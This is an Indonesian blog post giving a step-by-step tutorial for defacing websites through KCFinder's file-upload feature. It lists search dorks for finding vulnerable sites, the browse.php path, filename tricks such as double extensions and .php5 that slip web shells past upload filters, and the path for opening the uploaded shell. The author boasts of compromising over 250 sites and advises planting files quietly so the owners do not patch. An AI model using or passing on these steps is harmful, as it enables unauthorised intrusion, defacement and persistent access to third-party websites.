Deface dengan metode kcfinder

Kembali lagi dengan Bayz21 ^^
Lama ga buat tutor ^^
kali ini gw bakal share tutor deface poc kcfinder. poc andalan gw :'v maklum newbie.
emang sih ini poc lawas,pasti kalian berfikir mungkin akan susah cari web yg perawan. tapi itu semua kembali lagi kepada pinter2nya lu ngembangin dork ^^
buktinya gw bisa mirror in 250+ web fresh cuma pake ini poc :'v (pamer dikit)
oke langsung saja ke tutor

pertama dorking dulu seperti biasa
inurl:/kcfinder
inurl:/kcfinder site:(isi nama domain)
inurl:/ckeditor/kcfinder
inurl:/modules/
inurl:/plugins
lainnya kembangin sendiri :'v

setelah dapet web yg kalian suka.
masukan exploitnya
http://site.co.li/path/kcfinder/browse.php
maka akan muncul seperti ini


jika muncul seperti itu + belum ada orang yg tanem shell di situ . berbahagialah :'v
langsung saja lu upload shell kesayangan kalian
shell bisa berformat seperti ini :
namashell.php.xxxjpg
namashell.php.pjpg
namashell.php5


jika vuln. maka shell kita akan terupload seperti itu
kemudian buka shell kalian dengan
http://site.co.li/path/kcfinder/upload/files/namashellmu
dan tara






silahkan mau diapakan webnya ^^
saran : klo dapet web domainnya banyak, titip file aja dulu. daripada ntar lu tebas index ketauan,padahal baru pepes dikit, shell lu di apus, web di patch , nyesel dah :'v (pengalaman)

sekian tutor dari gw ^^
Previous
Next Post »

1 comments:

Click here for comments
NEW SOSMED
admin
19 August 2017 at 06:02 ×

bang boleh request gak?
bang buatin tutor bikin shell untuk pemula dong.....plisss

Congrats bro NEW SOSMED you got PERTAMAX...! hehehehe...
Reply
avatar
Thanks for your comment